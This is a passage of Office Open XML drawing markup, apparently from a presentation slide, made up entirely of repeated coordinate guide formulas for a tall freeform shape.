              <a:gd name="connsiteX4" fmla="*/ 115450 w 1342163"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 126950 w 1342163"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 144357 w 1342163"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 155935 w 1342163"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 228778 w 1342163"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 244465 w 1342163"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 263305 w 1342163"/>
              <a:gd name="connsiteY10" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 251079 w 1342163"/>
              <a:gd name="connsiteY11" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 243737 w 1342163"/>
              <a:gd name="connsiteY12" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 242535 w 1342163"/>
              <a:gd name="connsiteY13" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 255506 w 1342163"/>
              <a:gd name="connsiteY14" fmla="*/ 6061464 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 250120 w 1342163"/>
              <a:gd name="connsiteY15" fmla="*/ 5905303 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 280078 w 1342163"/>
              <a:gd name="connsiteY16" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 309876 w 1342163"/>
              <a:gd name="connsiteY17" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 323888 w 1342163"/>
              <a:gd name="connsiteY18" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 348319 w 1342163"/>
              <a:gd name="connsiteY19" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 359443 w 1342163"/>
              <a:gd name="connsiteY20" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 385202 w 1342163"/>
              <a:gd name="connsiteY21" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 423583 w 1342163"/>
              <a:gd name="connsiteY22" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 429742 w 1342163"/>
              <a:gd name="connsiteY23" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 438024 w 1342163"/>
              <a:gd name="connsiteY24" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 441634 w 1342163"/>
              <a:gd name="connsiteY25" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 455500 w 1342163"/>
              <a:gd name="connsiteY26" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 458231 w 1342163"/>
              <a:gd name="connsiteY27" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 456489 w 1342163"/>
              <a:gd name="connsiteY28" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 463398 w 1342163"/>
              <a:gd name="connsiteY29" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 474657 w 1342163"/>
              <a:gd name="connsiteY30" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 480560 w 1342163"/>
              <a:gd name="connsiteY31" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 484393 w 1342163"/>
              <a:gd name="connsiteY32" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 479873 w 1342163"/>
              <a:gd name="connsiteY33" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 471521 w 1342163"/>
              <a:gd name="connsiteY34" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 452174 w 1342163"/>
              <a:gd name="connsiteY35" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 453803 w 1342163"/>
              <a:gd name="connsiteY36" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 441503 w 1342163"/>
              <a:gd name="connsiteY37" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 441228 w 1342163"/>
              <a:gd name="connsiteY38" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 433306 w 1342163"/>
              <a:gd name="connsiteY39" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 455900 w 1342163"/>
              <a:gd name="connsiteY40" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 466796 w 1342163"/>
              <a:gd name="connsiteY41" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 474142 w 1342163"/>
              <a:gd name="connsiteY42" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 473438 w 1342163"/>
              <a:gd name="connsiteY43" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 476881 w 1342163"/>
              <a:gd name="connsiteY44" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 484419 w 1342163"/>
              <a:gd name="connsiteY45" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 498311 w 1342163"/>
              <a:gd name="connsiteY46" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 480837 w 1342163"/>
              <a:gd name="connsiteY47" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 456245 w 1342163"/>
              <a:gd name="connsiteY48" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 441720 w 1342163"/>
              <a:gd name="connsiteY49" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 416894 w 1342163"/>
              <a:gd name="connsiteY50" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 374174 w 1342163"/>
              <a:gd name="connsiteY51" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 308426 w 1342163"/>
              <a:gd name="connsiteY52" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 279243 w 1342163"/>
              <a:gd name="connsiteY53" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 283313 w 1342163"/>
              <a:gd name="connsiteY54" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 272203 w 1342163"/>
              <a:gd name="connsiteY55" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 251144 w 1342163"/>
              <a:gd name="connsiteY56" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 241031 w 1342163"/>
              <a:gd name="connsiteY57" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 225248 w 1342163"/>
              <a:gd name="connsiteY58" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 222706 w 1342163"/>
              <a:gd name="connsiteY59" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 223699 w 1342163"/>
              <a:gd name="connsiteY60" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 196683 w 1342163"/>
              <a:gd name="connsiteY61" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 173240 w 1342163"/>
              <a:gd name="connsiteY62" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 127039 w 1342163"/>
              <a:gd name="connsiteY63" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 98476 w 1342163"/>
              <a:gd name="connsiteY64" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 79271 w 1342163"/>
              <a:gd name="connsiteY65" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 85093 w 1342163"/>
              <a:gd name="connsiteY66" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 71178 w 1342163"/>
              <a:gd name="connsiteY67" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 79485 w 1342163"/>
              <a:gd name="connsiteY68" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 85358 w 1342163"/>
              <a:gd name="connsiteY69" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 66946 w 1342163"/>
              <a:gd name="connsiteY70" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 55682 w 1342163"/>
              <a:gd name="connsiteY71" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 57138 w 1342163"/>
              <a:gd name="connsiteY72" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 52003 w 1342163"/>
              <a:gd name="connsiteY73" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 12141 w 1342163"/>
              <a:gd name="connsiteY74" fmla="*/ 711705 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 9051 w 1342163"/>
              <a:gd name="connsiteY75" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 2707 w 1342163"/>
              <a:gd name="connsiteY76" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 3 w 1342163"/>
              <a:gd name="connsiteY77" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 3911 w 1342163"/>
              <a:gd name="connsiteY78" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 29283 w 1342163"/>
              <a:gd name="connsiteY79" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 29113 w 1342163"/>
              <a:gd name="connsiteY80" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 34806 w 1342163"/>
              <a:gd name="connsiteY81" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 44500 w 1342163"/>
              <a:gd name="connsiteY82" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 43543 w 1342163"/>
              <a:gd name="connsiteY83" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 33828 w 1342163"/>
              <a:gd name="connsiteY84" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY85" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78857 w 1342163"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115450 w 1342163"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 126950 w 1342163"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 144357 w 1342163"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 155935 w 1342163"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 228778 w 1342163"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 244465 w 1342163"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 263305 w 1342163"/>
              <a:gd name="connsiteY10" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 251079 w 1342163"/>
              <a:gd name="connsiteY11" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 243737 w 1342163"/>
              <a:gd name="connsiteY12" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 242535 w 1342163"/>
              <a:gd name="connsiteY13" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 255506 w 1342163"/>
              <a:gd name="connsiteY14" fmla="*/ 6061464 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 250120 w 1342163"/>
              <a:gd name="connsiteY15" fmla="*/ 5905303 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 280078 w 1342163"/>
              <a:gd name="connsiteY16" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 309876 w 1342163"/>
              <a:gd name="connsiteY17" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 323888 w 1342163"/>
              <a:gd name="connsiteY18" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 348319 w 1342163"/>
              <a:gd name="connsiteY19" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 359443 w 1342163"/>
              <a:gd name="connsiteY20" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 385202 w 1342163"/>
              <a:gd name="connsiteY21" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 423583 w 1342163"/>
              <a:gd name="connsiteY22" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 429742 w 1342163"/>
              <a:gd name="connsiteY23" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 438024 w 1342163"/>
              <a:gd name="connsiteY24" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 441634 w 1342163"/>
              <a:gd name="connsiteY25" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 455500 w 1342163"/>
              <a:gd name="connsiteY26" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 458231 w 1342163"/>
              <a:gd name="connsiteY27" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 456489 w 1342163"/>
              <a:gd name="connsiteY28" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 463398 w 1342163"/>
              <a:gd name="connsiteY29" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 474657 w 1342163"/>
              <a:gd name="connsiteY30" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 480560 w 1342163"/>
              <a:gd name="connsiteY31" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 484393 w 1342163"/>
              <a:gd name="connsiteY32" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 479873 w 1342163"/>
              <a:gd name="connsiteY33" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 471521 w 1342163"/>
              <a:gd name="connsiteY34" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 452174 w 1342163"/>
              <a:gd name="connsiteY35" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 453803 w 1342163"/>
              <a:gd name="connsiteY36" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 441503 w 1342163"/>
              <a:gd name="connsiteY37" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 441228 w 1342163"/>
              <a:gd name="connsiteY38" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 433306 w 1342163"/>
              <a:gd name="connsiteY39" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 455900 w 1342163"/>
              <a:gd name="connsiteY40" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 466796 w 1342163"/>
              <a:gd name="connsiteY41" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 474142 w 1342163"/>
              <a:gd name="connsiteY42" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 473438 w 1342163"/>
              <a:gd name="connsiteY43" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 476881 w 1342163"/>
              <a:gd name="connsiteY44" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 484419 w 1342163"/>
              <a:gd name="connsiteY45" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 498311 w 1342163"/>
              <a:gd name="connsiteY46" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 480837 w 1342163"/>
              <a:gd name="connsiteY47" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 456245 w 1342163"/>
              <a:gd name="connsiteY48" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 441720 w 1342163"/>
              <a:gd name="connsiteY49" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 416894 w 1342163"/>
              <a:gd name="connsiteY50" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 374174 w 1342163"/>
              <a:gd name="connsiteY51" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 308426 w 1342163"/>
              <a:gd name="connsiteY52" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 279243 w 1342163"/>
              <a:gd name="connsiteY53" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 283313 w 1342163"/>
              <a:gd name="connsiteY54" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 272203 w 1342163"/>
              <a:gd name="connsiteY55" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 251144 w 1342163"/>
              <a:gd name="connsiteY56" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 241031 w 1342163"/>
              <a:gd name="connsiteY57" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 225248 w 1342163"/>
              <a:gd name="connsiteY58" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 222706 w 1342163"/>
              <a:gd name="connsiteY59" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 223699 w 1342163"/>
              <a:gd name="connsiteY60" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 196683 w 1342163"/>
              <a:gd name="connsiteY61" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 173240 w 1342163"/>
              <a:gd name="connsiteY62" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 127039 w 1342163"/>
              <a:gd name="connsiteY63" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 98476 w 1342163"/>
              <a:gd name="connsiteY64" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 79271 w 1342163"/>
              <a:gd name="connsiteY65" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 85093 w 1342163"/>
              <a:gd name="connsiteY66" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 71178 w 1342163"/>
              <a:gd name="connsiteY67" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 79485 w 1342163"/>
              <a:gd name="connsiteY68" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 85358 w 1342163"/>
              <a:gd name="connsiteY69" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 66946 w 1342163"/>
              <a:gd name="connsiteY70" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 55682 w 1342163"/>
              <a:gd name="connsiteY71" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 57138 w 1342163"/>
              <a:gd name="connsiteY72" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 52003 w 1342163"/>
              <a:gd name="connsiteY73" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 12141 w 1342163"/>
              <a:gd name="connsiteY74" fmla="*/ 711705 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 9051 w 1342163"/>
              <a:gd name="connsiteY75" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 2707 w 1342163"/>
              <a:gd name="connsiteY76" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 3 w 1342163"/>
              <a:gd name="connsiteY77" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 3911 w 1342163"/>
              <a:gd name="connsiteY78" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 29283 w 1342163"/>
              <a:gd name="connsiteY79" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 29113 w 1342163"/>
              <a:gd name="connsiteY80" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 34806 w 1342163"/>
              <a:gd name="connsiteY81" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 44500 w 1342163"/>
              <a:gd name="connsiteY82" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 43543 w 1342163"/>
              <a:gd name="connsiteY83" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 33828 w 1342163"/>
              <a:gd name="connsiteY84" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY85" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78857 w 1342163"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115450 w 1342163"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 126950 w 1342163"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 144357 w 1342163"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 155935 w 1342163"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 228778 w 1342163"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 244465 w 1342163"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 263305 w 1342163"/>
              <a:gd name="connsiteY10" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 251079 w 1342163"/>
              <a:gd name="connsiteY11" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 243737 w 1342163"/>
              <a:gd name="connsiteY12" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 242535 w 1342163"/>
              <a:gd name="connsiteY13" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 255506 w 1342163"/>
              <a:gd name="connsiteY14" fmla="*/ 6061464 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 250120 w 1342163"/>
              <a:gd name="connsiteY15" fmla="*/ 5905303 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 280078 w 1342163"/>
              <a:gd name="connsiteY16" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 309876 w 1342163"/>
              <a:gd name="connsiteY17" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 323888 w 1342163"/>
              <a:gd name="connsiteY18" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 348319 w 1342163"/>
              <a:gd name="connsiteY19" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 359443 w 1342163"/>
              <a:gd name="connsiteY20" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 385202 w 1342163"/>
              <a:gd name="connsiteY21" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 423583 w 1342163"/>
              <a:gd name="connsiteY22" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 429742 w 1342163"/>
              <a:gd name="connsiteY23" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 438024 w 1342163"/>
              <a:gd name="connsiteY24" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 441634 w 1342163"/>
              <a:gd name="connsiteY25" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 455500 w 1342163"/>
              <a:gd name="connsiteY26" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 458231 w 1342163"/>
              <a:gd name="connsiteY27" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 456489 w 1342163"/>
              <a:gd name="connsiteY28" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 463398 w 1342163"/>
              <a:gd name="connsiteY29" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 474657 w 1342163"/>
              <a:gd name="connsiteY30" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 480560 w 1342163"/>
              <a:gd name="connsiteY31" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 484393 w 1342163"/>
              <a:gd name="connsiteY32" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 479873 w 1342163"/>
              <a:gd name="connsiteY33" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 471521 w 1342163"/>
              <a:gd name="connsiteY34" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 452174 w 1342163"/>
              <a:gd name="connsiteY35" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 453803 w 1342163"/>
              <a:gd name="connsiteY36" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 441503 w 1342163"/>
              <a:gd name="connsiteY37" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 441228 w 1342163"/>
              <a:gd name="connsiteY38" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 433306 w 1342163"/>
              <a:gd name="connsiteY39" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 455900 w 1342163"/>
              <a:gd name="connsiteY40" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 466796 w 1342163"/>
              <a:gd name="connsiteY41" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 474142 w 1342163"/>
              <a:gd name="connsiteY42" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 473438 w 1342163"/>
